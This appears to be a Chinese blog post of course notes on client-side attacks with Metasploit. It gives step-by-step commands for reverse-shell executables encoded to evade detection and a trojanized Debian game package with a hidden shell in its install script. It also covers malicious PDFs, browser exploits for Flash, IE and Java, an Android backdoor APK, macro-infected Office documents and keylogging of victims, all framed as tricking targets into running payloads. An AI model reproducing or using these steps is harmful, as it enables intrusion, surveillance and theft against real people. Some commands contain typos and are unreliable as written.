MSF(五):客户端渗透

客户端渗透

安全牛学习Metasploit Framework笔记

在无法突破网络边界的情况下转而攻击客户端

1、含有漏洞利用代码的WEB站点

  • 利用客户端漏洞

2、社会工程学

  • 直接骗取到敏感信息
  • 含有漏洞利用代码的DOC、PDF等文档或Payload,诱骗被害者执行

3、诱骗被害者执行Payload (windows)
注:msfvenom集合了编码、payload

  • msfvenom --list-options -p windows/shell/reverse_tcp
    查看payload的基本信息
  • msfvenom --platform windows -p windows/shel/reverse_tcp LHOST=x.x.x.x LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i -6 -f exe -o 1.exe
参数:
-a:指定目标系统的硬件架构
--platform:指定目标运行平台
-p:指定payload
LHOST:反弹连接的目标IP地址
LPORT:反弹连接的目标端口
-b:去掉坏字符
-e:使用编码模块
-i:编码次数
-f:指定输出文件格式
-o:输出文件名
  • msfconsole (启动侦听,注意payload的port要和前面的msfvenom设置的一样)
    use exploit/multi/handler
    set payload windows/shell/reverse_tcp
    set LHOST x.x.x.x
    set LPORT 9898
    exploit
    只要目标客户端执行我们制作的exe文件,我们即可获得目标shell

4、诱骗被害者执行Payload (Linux Deb安装包)

  • apt-get --download-only install freesweep
    因为只需要dep文件,所以加上参数–download-only,下载好的文件保存在/var/cache/qpt/archives
  • dpkg -x freesweep_0.90-1 i386.deb free
    解压缩目标文件,到指定目录free下
  • mkdir free/DEBIAN && cd free/DEBIAN
  • vi control
    内容:
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where
 one tries to find all the mines without igniting any, based on hints given
 by the computer. Unlike most implementations of this game, Freesweep
 works in any visual text display - in Linux console, in an xterm, and in
 most text-based terminals currently in use.
  • vi postinst
    内容:
#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/
freesweep_scores & /usr/games/freesweep &
  • msfvenom --platform linux -p linux/x86/shell/reverse_ tcp LHOST=x.x.x.x LPORT=9999 -b "\x00" -f elf -o /root/free/usr/games/freesweep_ scores
  • chmod 755 postinst
  • dpkg-deb --build /root/free
  • 将/root/下的free.deb,传给目标
  • msfconsole启动侦听
    use exploit/multi/handler
    set payload linux/x86/shell/reverse_tcp
    set lport 9999
    exploit(开启侦听)
  • 只要目标dpkg -i free.deb,安装该文件,我们侦听的端口就会获得反弹的shell

5、利用Acrobat Reader漏洞执行payload

(1)构造PDF文件,诱使目标点击

  • exploit/windows/fileformat/adobe_utilprintf
  • set payload windows/meterpreter/reverse_tcp
  • exploit
  • use exploit/multi/handleer(开启侦听)
  • set payload windwos/meterpreter/reverse_tcp
  • exploit
  • 只要目标执行PDF文件,我们即可获得shell

(2)构造恶意网站:,诱使目标访问

  • exploit/windows/browser/adobe_utilprintf
  • set payload windows/meterpreter/reverse_tcp
  • exploit
    (原理:只要目标访问我们设定的网址,便会执行漏洞代码;随后反弹shell给我们的攻击机)
  • use priv
    本地提权
  • run post/windows/capture/keylog_recorder
    对目标客户端启动键盘记录
  • msf外tail查看目标键盘最新输入的数据,tail -f实时查看目标键盘最新输入的数据

6、利用Flash插件漏洞执行payload
(1)攻击模块一

  • use exploit/multi/browser/adobe_flash_hacking_team_uaf
  • 设置反弹shell

(2)攻击模块二

  • use exploit/multi/browser/adobe_flash_opaque_background_uaf
  • 设置反弹shell

(3)辅助模块(该模块打包所有和浏览器相关的漏洞利用模块)

  • use auxiliary/server/browser_autopwn2
  • run
    在自动选取高质量浏览器利用模块
    原理:只要目标浏览器访问了我们设置的地址,便会将自动选取的利用模块依次利用,可以成功利用的模块即返回信息

7、利用IE浏览器漏洞执行payload

  • use exploit/windows/browser/ms14_064_ole_code_execution
  • set payload windows/meterpreter/reverse_tcp
  • exploit

8、利用JRE漏洞执行payload
(1)攻击模块一

  • use exploit/multi/browser/java_ jre17_driver_manager
  • set payload java/meterpreter/reverse_tcp

(2)攻击模块二

  • use exploit/multi/browser/java_jre17_jmxbean
  • set payload java/meterpreter/reverse_tcp

(3)攻击模块三

  • use exploit/multi/browser/java_jre17_reflection_types
  • set payload java/meterpreter/reverse_tcp

9、生成Android后门]程序
(1)攻击模块一(这种方法我没有生成apk,因为-f参数没有apk选项,所以干脆省略,但使用安卓手机解析时会显示出问题)

  • use payload/android/meterpreter/reverse_tcp
  • generate -f a.apk -p android -o peak.apk
    -p:目标平台、-o:生成文件
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
    (2)攻击方法二(因为-f不存在apk,所以可以将-f参数省略,直接-o或>,这一种解析不会出问题)
  • msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=192.168.100.162 lport=8899 -o peak.apk
  • use /exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • exploit

10、VBScript感染方式
(1)利用宏感染word、excel文档,绕过某些基于文件类型检查的安全机制

(2)生成vbscript脚本msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 - e x86/shikata_ga_nai -f vba-exe

(3)Office 2007 +(office版本2007以上)

  • 新建word文档,选择视图一一宏一一创建
  • 在创建的宏里粘入Payload第一部分的VBA代码
由
Sub Auto_Open()
				Goepu12
End Sub
到
Sub Workbook_Open()
				Auto_Open
End Sub
  • word文档正文沾入Payload第二部分的内容

    Jjiktezjhl
    到最后
    (4)Msf启动侦听
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • exploit

(5)只要目标打开office,攻击机即可获得shell

  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值